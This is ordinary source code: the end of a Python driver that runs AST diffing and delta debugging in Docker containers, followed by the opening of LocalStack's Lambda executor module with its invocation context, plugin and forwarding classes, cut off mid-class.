TZ = None
if time.timezone != 0:
SIGN = '+' if time.timezone > 0 else '-'
STDOFFSET = timedelta(seconds=-time.timezone)
if time.daylight:
DSTOFFSET = timedelta(seconds=-time.altzone)
else:
DSTOFFSET = STDOFFSET
dt = datetime.now()
tt = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.weekday(), 0, 0)
stamp = time.mktime(tt)
tt = time.localtime(stamp)
isdst = tt.tm_isdst > 0
tzname = None
offset = 0
if isdst:
tzname = time.tzname[1]
offset = DSTOFFSET
else:
tzname = time.tzname[0]
offset = STDOFFSET
TZ = '{}{}{}'.format(tzname, SIGN, offset)
###
def progress(proc, stat_path, timeout=TIMEOUT):
stat_mtime = None
print('\nMonitoring thread started.')
while True:
try:
st = os.stat(stat_path)
if st.st_mtime != stat_mtime and st.st_size > 0:
with open(stat_path, 'r') as f:
mes = f.read()
print('[{}]'.format(mes))
stat_mtime = st.st_mtime
except OSError as e:
pass
if proc.poll() is not None:
break
proc.wait()
if proc.returncode > 0:
print('Execution failed: {}'.format(proc.returncode))
def ensure_dir(dpath):
if not os.path.isdir(dpath):
try:
os.makedirs(dpath)
except Exception as e:
raise
def get_image_name(image_name, devel=False):
suffix = ''
if devel:
suffix = ':devel'
image = image_name+suffix
return image
def run_diffast(container_cmd, original, modified, cache=DEFAULT_CACHE_DIR, clear_cache=False, view=False,
dry_run=False, devel=False, image=IMAGE_NAME, verbose=False, debug=False):
if dry_run:
verbose = True
original = os.path.abspath(original)
modified = os.path.abspath(modified)
cache = os.path.abspath(cache)
if not dry_run:
ensure_dir(cache)
cca_cmd_path = '{}/bin/{}.opt'.format(CCA_HOME, 'diffast')
cca_cmd = cca_cmd_path
if clear_cache:
cca_cmd += ' -clearcache'
cca_cmd += ' -cache {}'.format(CCA_CACHE_DIR)
orig_dir = os.path.dirname(original)
mod_dir = os.path.dirname(modified)
common_path = os.path.commonpath([orig_dir, mod_dir])
orig_path = CCA_SOURCE_DIR+'/'+os.path.relpath(original, start=common_path)
mod_path = CCA_SOURCE_DIR+'/'+os.path.relpath(modified, start=common_path)
cca_cmd += ' {} {}'.format(orig_path, mod_path)
vol_opt = '-v "{}:{}"'.format(common_path, CCA_SOURCE_DIR)
vol_opt += ' -v "{}:{}"'.format(cache, CCA_CACHE_DIR)
run_cmd = '{} run'.format(container_cmd)
run_cmd += ' --rm'
run_cmd += ' -t'
if TZ:
run_cmd += ' -e "TZ={}"'.format(TZ)
run_cmd += ' {}'.format(vol_opt)
run_cmd += ' {} {}'.format(get_image_name(image, devel=devel), cca_cmd)
if verbose:
print(run_cmd)
if not dry_run:
try:
rc = run(run_cmd, bufsize=BUFSIZE, shell=True, universal_newlines=True)
if view:
app_path = os.path.join(os.path.dirname(sys.argv[0]),
'diffviewer',
'DiffViewer-darwin-x64',
'DiffViewer.app')
if os.path.exists(app_path):
cache_opt = ' --cache {}'.format(cache)
files_opt = ' --file0 {} --file1 {}'.format(original, modified)
view_cmd = 'open -n {} --args{}{}'.format(app_path, cache_opt, files_opt)
if verbose:
print(view_cmd)
rc = run(view_cmd, shell=True)
else:
print('DiffViewer not found. See diffviewer/README.md.')
except (KeyboardInterrupt, SystemExit):
print('Interrupted.')
except OSError as e:
print('Execution failed: {}'.format(e))
def gen_work_dir_name():
dt = datetime.now()
ts = '{:04}{:02}{:02}{:02}{:02}{:02}'.format(dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second)
dn = '{}{}'.format(CCA_WORK_DIR_NAME, ts)
return dn
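# e.g. gen_work_dir_name() -> '__CCA__20211106093015' (timestamped so repeated runs
# do not clobber each other's working directories)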
def run_dd(container_cmd, engine, proj_dir, v_good, v_bad, build_script='build.sh', test_script='test.sh',
proj_id=None, include=[], lang=[], algo='ddmin',
shuffle=False, greedy=False, staged=False,
dry_run=False, devel=False, image=IMAGE_NAME, verbose=True, debug=False, **kwargs):
if dry_run:
verbose = True
if proj_id == None:
proj_id = os.path.basename(proj_dir)
proj_dir = os.path.abspath(proj_dir)
work_dir = os.path.join(proj_dir, gen_work_dir_name())
print('Working directory is "{}".'.format(work_dir))
v_good_dir = os.path.join(proj_dir, v_good)
v_bad_dir = os.path.join(proj_dir, v_bad)
if not dry_run:
if os.path.exists(v_good_dir):
test_script_path = os.path.join(v_good_dir, test_script)
if not os.path.exists(test_script_path):
print('Test script not found: {}'.format(test_script_path))
else:
print('v_good not found: {}'.format(v_good_dir))
return
if not os.path.exists(v_bad_dir):
print('v_bad not found: {}'.format(v_bad_dir))
return
if os.path.exists(work_dir):
print('You are about to overwrite "{}".'.format(work_dir))
while True:
a = input('Do you want to proceed (y/n)? ')
if a == 'y':
break
elif a == 'n':
return
else:
ensure_dir(work_dir)
cca_proj_dir = CCA_VAR+'/project'
cca_cmd = '{}/ddutil/{}.py'.format(CCA_HOME, engine)
cca_cmd += ' {} {} {}'.format(cca_proj_dir, v_good, v_bad)
cca_cmd += ' --build-script {} --test-script {}'.format(build_script, test_script)
cca_cmd += ' --proj-id {}'.format(proj_id)
if include:
cca_cmd += ''.join([' --include {}'.format(i) for i in include])
if lang:
cca_cmd += ''.join([' --lang {}'.format(i) for i in lang])
cca_cmd += ' -a {}'.format(algo)
if shuffle:
cca_cmd += ' --shuffle'
if greedy:
cca_cmd += ' --greedy'
if staged:
cca_cmd += ' --staged'
if debug:
cca_cmd += ' -d'
elif verbose:
cca_cmd += ' -v'
if kwargs.get('custom_split', False):
cca_cmd += ' --custom-split'
max_stmt_level = kwargs.get('max_stmt_level', None)
modified_stmt_rate_thresh = kwargs.get('modified_stmt_rate_thresh', None)
mem = kwargs.get('mem', None)
if max_stmt_level != None:
cca_cmd += ' --max-stmt-level {}'.format(max_stmt_level)
if modified_stmt_rate_thresh != None:
cca_cmd += ' --modified-stmt-rate-thresh {}'.format(modified_stmt_rate_thresh)
if mem != None:
cca_cmd += ' --mem {}'.format(mem)
cca_cmd = '/bin/bash -c "(time {}) >& {}/{}.log"'.format(cca_cmd, CCA_VAR, engine)
run_cmd = '{} run --rm -t'.format(container_cmd)
vol_opt = ' -v "{}:{}"'.format(proj_dir, cca_proj_dir)
vol_opt += ' -v "{}:{}"'.format(work_dir, CCA_VAR)
installer_path = os.path.join(proj_dir, DEPENDENCIES_INSTALLER)
if os.path.exists(installer_path):
vol_opt += ' -v "{}:{}"'.format(installer_path, cca_proj_dir+'/'+DEPENDENCIES_INSTALLER)
if TZ:
run_cmd += ' -e "TZ={}"'.format(TZ)
run_cmd += vol_opt
run_cmd += ' {} {}'.format(get_image_name(image, devel=devel), cca_cmd)
stat_path = os.path.join(work_dir, STAT_NAME)
if verbose:
print(run_cmd)
if not dry_run:
if os.path.exists(stat_path):
#print('Removing "{}"...'.format(stat_path))
os.remove(stat_path)
try:
proc = Popen(run_cmd, bufsize=BUFSIZE, shell=True, universal_newlines=True)
th = Thread(target=progress, args=(proc, stat_path))
th.start()
th.join()
except (KeyboardInterrupt, SystemExit):
print('Interrupted.')
except OSError as e:
print('Execution failed: {}'.format(e))
def run_ddplain(container_cmd, proj_dir, v_good, v_bad, build_script='build.sh', test_script='test.sh',
proj_id=None, include=[], lang=[], algo='ddmin',
shuffle=False, greedy=False, staged=False,
dry_run=False, devel=False, image=IMAGE_NAME, verbose=True, debug=False):
run_dd(container_cmd, 'ddp', proj_dir, v_good, v_bad, build_script=build_script, test_script=test_script,
proj_id=proj_id, include=include, lang=lang, algo=algo,
shuffle=shuffle, greedy=greedy, staged=staged,
dry_run=dry_run, devel=devel, image=image, verbose=verbose, debug=debug)
def run_ddjava(container_cmd, proj_dir, v_good, v_bad, build_script='build.sh', test_script='test.sh',
proj_id=None, include=[], algo='ddmin',
shuffle=False, greedy=False, staged=False,
custom_split=False, max_stmt_level=8,
modified_stmt_rate_thresh=0.05, mem=8,
dry_run=False, devel=False, image=IMAGE_NAME, verbose=False, debug=False):
run_dd(container_cmd, 'ddj', proj_dir, v_good, v_bad, build_script=build_script, test_script=test_script,
proj_id=proj_id, include=include, lang=[], algo=algo,
shuffle=shuffle, greedy=greedy, staged=staged,
custom_split=custom_split, max_stmt_level=max_stmt_level,
modified_stmt_rate_thresh=modified_stmt_rate_thresh, mem=mem,
dry_run=dry_run, devel=devel, image=image, verbose=verbose, debug=debug)
def update(args):
cmd = '{} pull {}'.format(args.container_cmd, get_image_name(args.image, devel=args.devel))
if args.verbose or args.dry_run:
print(cmd)
if not args.dry_run:
try:
run(cmd, shell=True)
except OSError as e:
print('Execution failed: {}'.format(e))
def diffast(args):
run_diffast(args.container_cmd,
args.original, args.modified, cache=args.cache, clear_cache=args.force, view=args.view,
dry_run=args.dry_run, devel=args.devel, image=args.image, verbose=args.verbose, debug=args.debug)
def ddplain(args):
run_ddplain(args.container_cmd,
args.proj_dir, args.v_good, args.v_bad, args.build_script, args.test_script,
proj_id=args.proj_id, include=args.include, lang=args.lang, algo=args.algo,
shuffle=args.shuffle, greedy=args.greedy, staged=args.staged,
dry_run=args.dry_run, devel=args.devel, image=args.image, verbose=args.verbose, debug=args.debug)
def ddjava(args):
run_ddjava(args.container_cmd,
args.proj_dir, args.v_good, args.v_bad, args.build_script, args.test_script,
proj_id=args.proj_id, include=args.include, algo=args.algo,
shuffle=args.shuffle, greedy=args.greedy, staged=args.staged,
custom_split=args.custom_split, max_stmt_level=args.max_stmt_level,
modified_stmt_rate_thresh=args.modified_stmt_rate_thresh, mem=args.mem,
dry_run=args.dry_run, devel=args.devel, image=args.image, verbose=args.verbose, debug=args.debug)
def main():
parser = ArgumentParser(description='A CCA driver',
add_help=False,
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('-n', '--dry-run', dest='dry_run', action='store_true',
help='only print container commands')
parser.add_argument('--container-command', dest='container_cmd', metavar='CMD',
help='specify container command', default=CONTAINER_CMD)
parser.add_argument('-i', '--image', dest='image', type=str, metavar='IMAGE', default=IMAGE_NAME,
help='specify container image')
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true',
help='enable verbose printing')
parser.add_argument('-d', '--debug', dest='debug', action='store_true',
help='enable debug printing')
parser.add_argument('-x', '--experimental', dest='devel', action='store_true',
help='use experimental image')
p = ArgumentParser(add_help=True)
subparsers = p.add_subparsers(title='subcommands')
# Docker image update
parser_update = subparsers.add_parser('update',
description='Update docker image of CCA',
parents=[parser],
formatter_class=ArgumentDefaultsHelpFormatter)
parser_update.set_defaults(func=update)
# Diff/AST
parser_diffast = subparsers.add_parser('diffast',
description='Compare two programs',
parents=[parser],
formatter_class=ArgumentDefaultsHelpFormatter)
parser_diffast.add_argument('original', type=str, metavar='ORIGINAL', help='original source file')
parser_diffast.add_argument('modified', type=str, metavar='MODIFIED', help='modified source file')
parser_diffast.add_argument('--view', dest='view', action='store_true',
help='launch DiffViewer after comparison')
parser_diffast.add_argument('-f', '--force', dest='force', action='store_true',
help='force comparison (overwrite cache)')
parser_diffast.add_argument('-c', '--cache', dest='cache', default=DEFAULT_CACHE_DIR,
metavar='DIR', type=str, help='result cache directory')
parser_diffast.set_defaults(func=diffast)
# DDP
parser_ddp = subparsers.add_parser('ddplain',
description='Delta debugging on changes of (plain text) programs',
parents=[parser],
formatter_class=ArgumentDefaultsHelpFormatter)
parser_ddp.add_argument('proj_dir', type=str, help='project directory')
parser_ddp.add_argument('v_good', type=str, help='id of good version (proj_dir/v_good)')
parser_ddp.add_argument('v_bad', type=str, help='id of bad version (proj_dir/v_bad)')
parser_ddp.add_argument('--build-script', type=str, default='build.sh',
help='specify build script at proj_dir/v_good/')
parser_ddp.add_argument('--test-script', type=str, default='test.sh',
help='specify script at proj_dir/v_good/ that returns test result (PASS|FAIL|UNRESOLVED)')
parser_ddp.add_argument('--proj-id', type=str, metavar='PROJ_ID', default=None,
help='project id (dirname of PROJ_DIR is used by default)')
parser_ddp.add_argument('--include', type=str, metavar='DIR', action='append', default=[],
help='analyze only sub-directories (relative paths)')
parser_ddp.add_argument('--lang', type=str, metavar='LANG', action='append', choices=['java', 'python'],
help='specify languages {%(choices)s}')
parser_ddp.add_argument('-a', '--algo', dest='algo', choices=['ddmin', 'dd'],
help='specify DD algorithm', default='ddmin')
parser_ddp.add_argument('--shuffle', dest='shuffle', type=int, metavar='N', default=0,
help='shuffle delta components N times')
parser_ddp.add_argument('--greedy', dest='greedy', action='store_true',
help='try to find multiple solutions')
parser_ddp.add_argument('--staged', dest='staged', action='store_true',
help='enable staging')
parser_ddp.set_defaults(func=ddplain)
# DDJ
parser_ddj = subparsers.add_parser('ddjava',
description='Delta debugging on changes of Java programs',
parents=[parser],
formatter_class=ArgumentDefaultsHelpFormatter)
parser_ddj.add_argument('proj_dir', type=str, help='project directory')
parser_ddj.add_argument('v_good', type=str, help='id of good version (proj_dir/v_good)')
parser_ddj.add_argument('v_bad', type=str, help='id of bad version (proj_dir/v_bad)')
parser_ddj.add_argument('--build-script', type=str, default='build.sh',
help='specify build script at proj_dir/v_good/')
parser_ddj.add_argument('--test-script', type=str, default='test.sh',
help='specify script at proj_dir/v_good/ that returns test result (PASS|FAIL|UNRESOLVED)')
    parser_ddj.add_argument('--proj-id', type=str, metavar='PROJ_ID', default=None,
                            help='specify project id (dirname of PROJ_DIR is used by default)')
parser_ddj.add_argument('--include', type=str, metavar='DIR', action='append', default=[],
help='analyze only sub-directories (relative paths)')
parser_ddj.add_argument('-a', '--algo', dest='algo', choices=['ddmin', 'dd'],
help='specify DD algorithm', default='ddmin')
parser_ddj.add_argument('--shuffle', dest='shuffle', type=int, metavar='N', default=0,
help='shuffle delta components N times')
parser_ddj.add_argument('--greedy', dest='greedy', action='store_true',
help='try to find multiple solutions')
parser_ddj.add_argument('--staged', dest='staged', action='store_true',
help='enable staging')
parser_ddj.add_argument('--custom-split', dest='custom_split', action='store_true',
help='enable custom split')
parser_ddj.add_argument('--max-stmt-level', dest='max_stmt_level', default=8,
metavar='N', type=int, help='grouping statements at levels up to N')
parser_ddj.add_argument('--modified-stmt-rate-thresh', dest='modified_stmt_rate_thresh',
default=0.05, metavar='R', type=float,
help='suppress level 1+ statement grouping when modified statement rate is less than R')
parser_ddj.add_argument('-m', '--mem', dest='mem', metavar='GB', type=int,
choices=[2, 4, 8, 16, 32, 48, 64], default=8,
help='set available memory (GB) for container')
parser_ddj.set_defaults(func=ddjava)
#
args = p.parse_args()
try:
args.func(args)
except:
#raise
p.print_help()
if __name__ == '__main__':
main()
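# Usage sketch (hypothetical invocations: the subcommand and option names come from the parsers
# defined above, but the script file name "cca.py" is an assumption):
#   python cca.py update
#   python cca.py diffast --view Original.java Modified.java
#   python cca.py ddjava --algo ddmin --mem 8 /path/to/proj v_good v_bad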
|
lambda_executors.py
|
import base64
import contextlib
import glob
import json
import logging
import os
import re
import subprocess
import sys
import threading
import time
import traceback
import uuid
from multiprocessing import Process, Queue
from typing import Any, Callable, Dict, List, Optional, Tuple, Union
from localstack import config
from localstack.constants import DEFAULT_LAMBDA_CONTAINER_REGISTRY
from localstack.services.awslambda.lambda_utils import (
API_PATH_ROOT,
LAMBDA_RUNTIME_PROVIDED,
get_main_endpoint_from_container,
get_record_from_event,
is_java_lambda,
is_nodejs_runtime,
rm_docker_container,
store_lambda_logs,
)
from localstack.services.install import GO_LAMBDA_RUNTIME, INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.aws.aws_models import LambdaFunction
from localstack.utils.aws.dead_letter_queue import (
lambda_error_to_dead_letter_queue,
sqs_error_to_dead_letter_queue,
)
from localstack.utils.cloudwatch.cloudwatch_util import cloudwatched
from localstack.utils.common import (
TMP_FILES,
CaptureOutput,
get_all_subclasses,
get_free_tcp_port,
in_docker,
is_port_open,
json_safe,
last_index_of,
long_uid,
md5,
now,
retry,
run,
run_safe,
safe_requests,
save_file,
short_uid,
timestamp,
to_bytes,
to_str,
wait_for_port_open,
)
from localstack.utils.docker_utils import (
DOCKER_CLIENT,
ContainerException,
DockerContainerStatus,
PortMappings,
)
from localstack.utils.run import FuncThread
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = "cloud.localstack.LambdaExecutor"
LAMBDA_HANDLER_ENV_VAR_NAME = "_HANDLER"
EVENT_FILE_PATTERN = "%s/lambda.event.*.json" % config.dirs.tmp
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
MAX_ENV_ARGS_LENGTH = 20000
# port number used in lambci images for stay-open invocation mode
STAY_OPEN_API_PORT = 9001
INTERNAL_LOG_PREFIX = "ls-daemon: "
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = "aws:sqs"
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
# CWD folder of handler code in Lambda containers
DOCKER_TASK_FOLDER = "/var/task"
# Lambda event type
LambdaEvent = Union[Dict[str, Any], str, bytes]
class InvocationException(Exception):
def __init__(self, message, log_output=None, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
class LambdaContext(object):
DEFAULT_MEMORY_LIMIT = 1536
def __init__(
self, lambda_function: LambdaFunction, qualifier: str = None, context: Dict[str, Any] = None
):
context = context or {}
self.function_name = lambda_function.name()
self.function_version = lambda_function.get_qualifier_version(qualifier)
self.client_context = context.get("client_context")
self.invoked_function_arn = lambda_function.arn()
if qualifier:
self.invoked_function_arn += ":" + qualifier
self.cognito_identity = context.get("identity")
self.aws_request_id = str(uuid.uuid4())
self.memory_limit_in_mb = lambda_function.memory_size or self.DEFAULT_MEMORY_LIMIT
self.log_group_name = "/aws/lambda/%s" % self.function_name
self.log_stream_name = "%s/[1]%s" % (timestamp(format="%Y/%m/%d"), short_uid())
def get_remaining_time_in_millis(self):
# TODO implement!
return 1000 * 60
class AdditionalInvocationOptions:
# Maps file keys to file paths. The keys can be used as placeholders in the env. variables
# and command args to reference files - e.g., given `files_to_add` as {"f1": "/local/path"} and
# `env_updates` as {"MYENV": "{f1}"}, the Lambda handler will receive an environment variable
# `MYENV=/lambda/path` and the file /lambda/path will be accessible to the Lambda handler
# (either locally, or inside Docker).
files_to_add: Dict[str, str]
# Environment variable updates to apply for the invocation
env_updates: Dict[str, str]
# Updated command to use for starting the Lambda process (or None)
updated_command: Optional[str]
# Updated handler as entry point of Lambda function (or None)
updated_handler: Optional[str]
def __init__(
self,
files_to_add=None,
env_updates=None,
updated_command=None,
updated_handler=None,
):
self.files_to_add = files_to_add or {}
self.env_updates = env_updates or {}
self.updated_command = updated_command
self.updated_handler = updated_handler
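# Placeholder-resolution sketch (hypothetical key/path values): a plugin returning
#   AdditionalInvocationOptions(files_to_add={"cfg": "/host/tmp/app.cfg"},
#                               env_updates={"APP_CONFIG": "{cfg}"})
# causes apply_plugin_patches() below to make /host/tmp/app.cfg available to the Lambda
# (via provide_file_to_lambda) and to rewrite APP_CONFIG to the resulting in-container path.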
class InvocationResult:
def __init__(self, result, log_output=""):
if isinstance(result, InvocationResult):
raise Exception("Unexpected invocation result type: %s" % result)
self.result = result
self.log_output = log_output or ""
class InvocationContext:
lambda_function: LambdaFunction
function_version: str
handler: str
event: LambdaEvent
lambda_command: Union[str, List[str]] # TODO: change to List[str] ?
docker_flags: Union[str, List[str]] # TODO: change to List[str] ?
environment: Dict[str, str]
context: LambdaContext
invocation_type: str # "Event" or "RequestResponse"
def __init__(
self,
lambda_function: LambdaFunction,
event: LambdaEvent,
environment=None,
context=None,
lambda_command=None,
docker_flags=None,
function_version=None,
invocation_type=None,
):
self.lambda_function = lambda_function
self.handler = lambda_function.handler
self.event = event
self.environment = {} if environment is None else environment
self.context = {} if context is None else context
self.lambda_command = lambda_command
self.docker_flags = docker_flags
self.function_version = function_version
self.invocation_type = invocation_type
class LambdaExecutorPlugin:
"""Plugin abstraction that allows to hook in additional functionality into the Lambda executors."""
INSTANCES: List["LambdaExecutorPlugin"] = []
def initialize(self):
"""Called once, for any active plugin to run initialization logic (e.g., downloading dependencies).
Uses lazy initialization - i.e., runs only after the first should_apply() call returns True"""
pass
def should_apply(self, context: InvocationContext) -> bool:
"""Whether the plugin logic should get applied for the given Lambda invocation context."""
return False
def prepare_invocation(
self, context: InvocationContext
) -> Optional[Union[AdditionalInvocationOptions, InvocationResult]]:
"""Return additional invocation options for given Lambda invocation context. Optionally, an
InvocationResult can be returned, in which case the result is returned to the client right away."""
return None
def process_result(
self, context: InvocationContext, result: InvocationResult
) -> InvocationResult:
"""Optionally modify the result returned from the given Lambda invocation."""
return result
def init_function_configuration(self, lambda_function: LambdaFunction):
"""Initialize the configuration of the given function upon creation or function update."""
pass
def init_function_code(self, lambda_function: LambdaFunction):
"""Initialize the code of the given function upon creation or function update."""
pass
@classmethod
def get_plugins(cls) -> List["LambdaExecutorPlugin"]:
if not cls.INSTANCES:
classes = get_all_subclasses(LambdaExecutorPlugin)
cls.INSTANCES = [clazz() for clazz in classes]
return cls.INSTANCES
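# Minimal plugin sketch, kept as a comment on purpose: get_plugins() above auto-discovers every
# concrete subclass via get_all_subclasses, so an uncommented example class would be registered
# as a real plugin. The class name and env variable below are hypothetical.
#
# class EnvStampPlugin(LambdaExecutorPlugin):
#     def should_apply(self, context: InvocationContext) -> bool:
#         return True
#     def prepare_invocation(self, context: InvocationContext):
#         # only add an extra env variable; no files, no command/handler changes
#         return AdditionalInvocationOptions(env_updates={"INVOKED_VIA_PLUGIN": "1"})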
class LambdaInvocationForwarderPlugin(LambdaExecutorPlugin):
"""Plugin that forwards Lambda invocations to external targets defined in LAMBDA_FORWARD_URL"""
def should_apply(self, context: InvocationContext) -> bool:
"""If LAMBDA_FORWARD_URL is configured, forward the invocation of this Lambda to the target URL."""
func_forward_url = self._forward_url(context)
return bool(func_forward_url)
def prepare_invocation(
self, context: InvocationContext
) -> Optional[Union[AdditionalInvocationOptions, InvocationResult]]:
forward_url = self._forward_url(context)
result = self._forward_to_url(
forward_url,
context.lambda_function,
context.event,
context.context,
context.invocation_type,
)
return result
def _forward_to_url(
self,
forward_url: str,
lambda_function: LambdaFunction,
event: Union[Dict, bytes],
context: LambdaContext,
invocation_type: str,
) -> InvocationResult:
func_name = lambda_function.name()
url = "%s%s/functions/%s/invocations" % (forward_url, API_PATH_ROOT, func_name)
copied_env_vars = lambda_function.envvars.copy()
copied_env_vars["LOCALSTACK_HOSTNAME"] = config.HOSTNAME_EXTERNAL
copied_env_vars["LOCALSTACK_EDGE_PORT"] = str(config.EDGE_PORT)
headers = aws_stack.mock_aws_request_headers("lambda")
headers["X-Amz-Region"] = lambda_function.region()
headers["X-Amz-Request-Id"] = context.aws_request_id
headers["X-Amz-Handler"] = lambda_function.handler
headers["X-Amz-Function-ARN"] = context.invoked_function_arn
headers["X-Amz-Function-Name"] = context.function_name
headers["X-Amz-Function-Version"] = context.function_version
headers["X-Amz-Role"] = lambda_function.role
headers["X-Amz-Runtime"] = lambda_function.runtime
headers["X-Amz-Timeout"] = str(lambda_function.timeout)
headers["X-Amz-Memory-Size"] = str(context.memory_limit_in_mb)
headers["X-Amz-Log-Group-Name"] = context.log_group_name
headers["X-Amz-Log-Stream-Name"] = context.log_stream_name
headers["X-Amz-Env-Vars"] = json.dumps(copied_env_vars)
headers["X-Amz-Last-Modified"] = str(int(lambda_function.last_modified.timestamp() * 1000))
headers["X-Amz-Invocation-Type"] = invocation_type
headers["X-Amz-Log-Type"] = "Tail"
if context.client_context:
headers["X-Amz-Client-Context"] = context.client_context
if context.cognito_identity:
headers["X-Amz-Cognito-Identity"] = context.cognito_identity
data = run_safe(lambda: to_str(event)) or event
data = json.dumps(json_safe(data)) if isinstance(data, dict) else str(data)
LOG.debug(
"Forwarding Lambda invocation to LAMBDA_FORWARD_URL: %s" % config.LAMBDA_FORWARD_URL
)
result = safe_requests.post(url, data, headers=headers)
if result.status_code >= 400:
raise Exception(
"Received error status code %s from external Lambda invocation" % result.status_code
)
content = run_safe(lambda: to_str(result.content)) or result.content
LOG.debug(
"Received result from external Lambda endpoint (status %s): %s"
% (result.status_code, content)
)
result = InvocationResult(content)
return result
def _forward_url(self, context: InvocationContext) -> str:
env_vars = context.lambda_function.envvars
return env_vars.get("LOCALSTACK_LAMBDA_FORWARD_URL") or config.LAMBDA_FORWARD_URL
def handle_error(
lambda_function: LambdaFunction, event: Dict, error: Exception, asynchronous: bool = False
):
if asynchronous:
if get_record_from_event(event, "eventSource") == EVENT_SOURCE_SQS:
sqs_queue_arn = get_record_from_event(event, "eventSourceARN")
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
return sqs_error_to_dead_letter_queue(sqs_queue_arn, event, error)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(lambda_function, event, error)
class LambdaAsyncLocks:
locks: Dict[str, Union[threading.Semaphore, threading.Lock]]
creation_lock: threading.Lock
def __init__(self):
self.locks = {}
self.creation_lock = threading.Lock()
def assure_lock_present(
self, key: str, lock: Union[threading.Semaphore, threading.Lock]
) -> Union[threading.Semaphore, threading.Lock]:
with self.creation_lock:
return self.locks.setdefault(key, lock)
LAMBDA_ASYNC_LOCKS = LambdaAsyncLocks()
class LambdaExecutor(object):
"""Base class for Lambda executors. Subclasses must overwrite the _execute method"""
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, lambda_function: LambdaFunction):
# setup environment pre-defined variables for docker environment
result = lambda_function.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
# injecting the region into the docker environment
aws_stack.inject_region_into_env(result, lambda_function.region())
return result
def execute(
self,
func_arn: str, # TODO remove and get from lambda_function
lambda_function: LambdaFunction,
event: Dict,
context: LambdaContext = None,
version: str = None,
asynchronous: bool = False,
callback: Callable = None,
lock_discriminator: str = None,
):
# note: leave here to avoid circular import issues
from localstack.utils.aws.message_forwarding import lambda_result_to_destination
def do_execute(*args):
@cloudwatched("lambda")
def _run(func_arn=None):
with contextlib.ExitStack() as stack:
if lock_discriminator:
stack.enter_context(LAMBDA_ASYNC_LOCKS.locks[lock_discriminator])
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
invocation_type = "Event" if asynchronous else "RequestResponse"
inv_context = InvocationContext(
lambda_function,
event=event,
function_version=version,
context=context,
invocation_type=invocation_type,
)
try:
result = self._execute(lambda_function, inv_context)
except Exception as e:
raised_error = e
dlq_sent = handle_error(lambda_function, event, e, asynchronous)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(
result, func_arn, event, error=raised_error, dlq_sent=dlq_sent
)
lambda_result_to_destination(
lambda_function, event, result, asynchronous, raised_error
)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug(
"Lambda executed in Event (asynchronous) mode, no response will be returned to caller"
)
FuncThread(do_execute).start()
return InvocationResult(None, log_output="Lambda executed asynchronously.")
return do_execute()
def _execute(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
"""This method must be overwritten by subclasses."""
raise NotImplementedError
def startup(self):
"""Called once during startup - can be used, e.g., to prepare Lambda Docker environment"""
pass
    def cleanup(self, arn=None):
        """Clean up executor resources (e.g., left-over Docker containers) - called, e.g., at startup or when a function is removed"""
        pass
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
"""Make the given file available to the Lambda process (e.g., by copying into the container) for the
given invocation context; Returns the path to the file that will be available to the Lambda handler."""
raise NotImplementedError
def apply_plugin_patches(self, inv_context: InvocationContext) -> Optional[InvocationResult]:
"""Loop through the list of plugins, and apply their patches to the invocation context (if applicable)"""
invocation_results = []
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
# initialize, if not done yet
if not hasattr(plugin, "_initialized"):
LOG.debug("Initializing Lambda executor plugin %s", plugin.__class__)
plugin.initialize()
plugin._initialized = True
# invoke plugin to prepare invocation
inv_options = plugin.prepare_invocation(inv_context)
if not inv_options:
continue
if isinstance(inv_options, InvocationResult):
invocation_results.append(inv_options)
continue
# copy files
file_keys_map = {}
for key, file_path in inv_options.files_to_add.items():
file_in_container = self.provide_file_to_lambda(file_path, inv_context)
file_keys_map[key] = file_in_container
# replace placeholders like "{<fileKey>}" with corresponding file path
for key, file_path in file_keys_map.items():
for env_key, env_value in inv_options.env_updates.items():
inv_options.env_updates[env_key] = str(env_value).replace(
"{%s}" % key, file_path
)
if inv_options.updated_command:
inv_options.updated_command = inv_options.updated_command.replace(
"{%s}" % key, file_path
)
inv_context.lambda_command = inv_options.updated_command
# update environment
inv_context.environment.update(inv_options.env_updates)
# update handler
if inv_options.updated_handler:
inv_context.handler = inv_options.updated_handler
if invocation_results:
            # TODO: This is currently non-deterministic! If multiple execution plugins attempt to return
            # an invocation result right away, only the first one is returned. We need a more solid
            # mechanism for conflict resolution if multiple plugins interfere!
if len(invocation_results) > 1:
LOG.warning(
"Multiple invocation results returned from "
"LambdaExecutorPlugin.prepare_invocation calls - choosing the first one: %s",
invocation_results,
)
return invocation_results[0]
def process_result_via_plugins(
self, inv_context: InvocationContext, invocation_result: InvocationResult
) -> InvocationResult:
"""Loop through the list of plugins, and apply their post-processing logic to the Lambda invocation result."""
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
invocation_result = plugin.process_result(inv_context, invocation_result)
return invocation_result
class ContainerInfo:
"""Contains basic information about a docker container."""
def __init__(self, name, entry_point):
